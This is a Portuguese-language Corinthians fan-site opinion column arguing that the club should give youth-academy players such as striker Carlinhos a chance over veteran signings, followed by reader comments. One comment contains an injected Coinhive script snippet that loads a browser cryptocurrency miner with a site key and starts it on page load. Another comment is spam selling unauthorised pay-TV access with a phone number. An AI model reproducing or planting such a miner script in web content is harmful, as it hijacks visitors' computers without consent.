17/1/2018 18:36

[Opinião] Por que não confiar na base?

Por Lucas Anuzi

[Opinião] Por que não confiar na base?
Toda janela de transferência é a mesma coisa. Rumores atrás de rumores, especulação atrás de especulação e pouca coisa concreta de fato, devido ao fato dos jornais precisarem ser vendidos e empresários que tentam valorizar seus jogadores criando interesse de um time grande.

O nível dos jogadores brasileiros disponíveis no mercado hoje é duvidoso e infelizmente a atual saúde financeira do clube não nos permite disputar as grandes contratações com os rivais, que oferecem salários astronômicos para seduzirem atletas providos de mais qualidade técnica. Com isso, nos resta sofrer em negociações com Henriques Dourados e Gilbertos que tem aos montes por aí.

Será que não passa pela cabeça da diretoria e comissão técnica que seria muito mais vantajoso apostar em alguém da casa? Especificamente da base? Além de não haver nenhum tipo de custo com comissões de empresários, luvas e toda burocracia que envolve contratar alguém de fora, existe também a possibilidade de lucro em uma possível negociação para o exterior futuramente.

Quando falamos neste assunto, impossível não lembrar do caso do atacante Carlinhos. Artilheiro da Copa São Paulo de Futebol Jr. de 2017, marcando 11 gols na campanha que rendeu o décimo título alvinegro da competição, subiu para o profissional cheio de expectativa por parte da torcida. Mas logo de cara houve problemas contratuais quando o pai do atleta alegou falta de pagamento do Corinthians ao Novorizontino em transferência realizada em 2014. Pelo acordo, deveria ser pago ao clube do interior, entrada de R$100 mil e oito parcelas de R$ 50 mil. A última informação que se teve foi que haviam sido pagas apenas a entrada e duas parcelas da negociação. O jovem atacante sofreu muito com lesões que o afastou de algumas rodadas do Brasileirão ano passado. Também por isso, o técnico Fábio Carille optou por escalar Kazim nas rodadas em que Jô não estava disponível.

No torneio da Flórida, onde é possível fazer testes para o decorrer da temporada, entrou no segundo tempo do jogo contra o Rangers onde tivemos uma atuação pífia e o garoto pouco pode mostrar. Nova temporada se inicia hoje e mais uma vez Carlinhos foi preterido por Kazim. Visando a Taça Libertadores, é compreensível entender que seria muita pressão para um garoto de 18 anos, mas o Paulista não seria a competição ideal para dar experiência não só a ele, mas também aos outros jovens da base? Convenhamos que Junior Dutra, Kazim e Sheik, em fim de carreira, não são os nomes dos sonhos quando se pensa em conquistar a América pela segunda vez. Ainda seria útil no ponto de vista tático do time, pois seu estilo assemelha-se muito ao do Jô, que rumou para o Japão em busca da sua vaga na seleção do Tite (contém ironia). Sendo assim, o sistemático Carille não teria que realizar mudanças mirabolantes no já consolidado esquema do time.

Esse texto trouxe muitas perguntas, mas infelizmente ainda não consegue trazer as respostas. O jeito é acompanhar o decorrer da temporada para ver se alguma destas questões são respondidas. Mas sempre defenderei a tese de que a base existe para ser usada e não pra ser mais uma fonte de renda para empresários.





VEJA TAMBÉM
- Corinthians goleia o Fluminense e vence a primeira no Brasileirão
- Timão escalado para o jogo contra o Fluminense
- Timão escalado para o jogo contra o Argentinos Juniors









9771 visitas - Fonte: tudotimao

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

o culpado disso tudo é o carille coloca o porra do kazim ele nem conseque fazer gol sem goleiro taí 1xo pra ponte preta tá na hora de dar uma pressão

eu acho q o Carlinhos tinha q ser titular no ligar do kazim Carlinhos joga muito mais

SÓ base não ganha libertadores
mlks falta malícia e rodagem
ex Corinthians e Racing o que deu? tem que ter experiência
o carile ta certo o trabalho e dele e ele não vai sacrificar o trabalho dele pondo um mlk que por falta de experiência pode falhar.

sê for confiar na base e segunda divisão na serta falam muito de carlinho este garoto não vi Grande coisa nele exemplo na Copinha não se aproveita nada molecada tudo grosso pra futuro só tem 2 jogador que é razoável

muito simples o motivo vamos contratar para dar comissão aos empresários e depois eles bancam o almoço da diretoria.
Agora coloca os garotos no time fraco já para queimar eles,coca devagar no segundo tempo depois um jogo o outro ai quando for ver quando bom jogador está titular que diga Robinho, Neymar, Diego, Paulo Ganso e a nova safra do SANTOS. Lá não tem essa grana toda que entra nos grandes da capital. Nosso Corinthians tem muito mais jogadores jovens na base do que muito time grande no mundo .

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

boa pergunta acho q eles querem q os meninos venham e jogão primeiro jogo e sejam iguais a Messi, Neymar só pode porque sem sequencia e ritmo d jogo impossível saber se vai dar certo ou não ai fica comprando um monte q nem um vale um ....e lota o elenco

vai timao

apostem em Carlinhos.

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Lógico que sim pois invés de contratar esse pé de rato q estao só sugando o Corinthians põe os mlk da base pra jogar tem uma pá de mlk bom

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade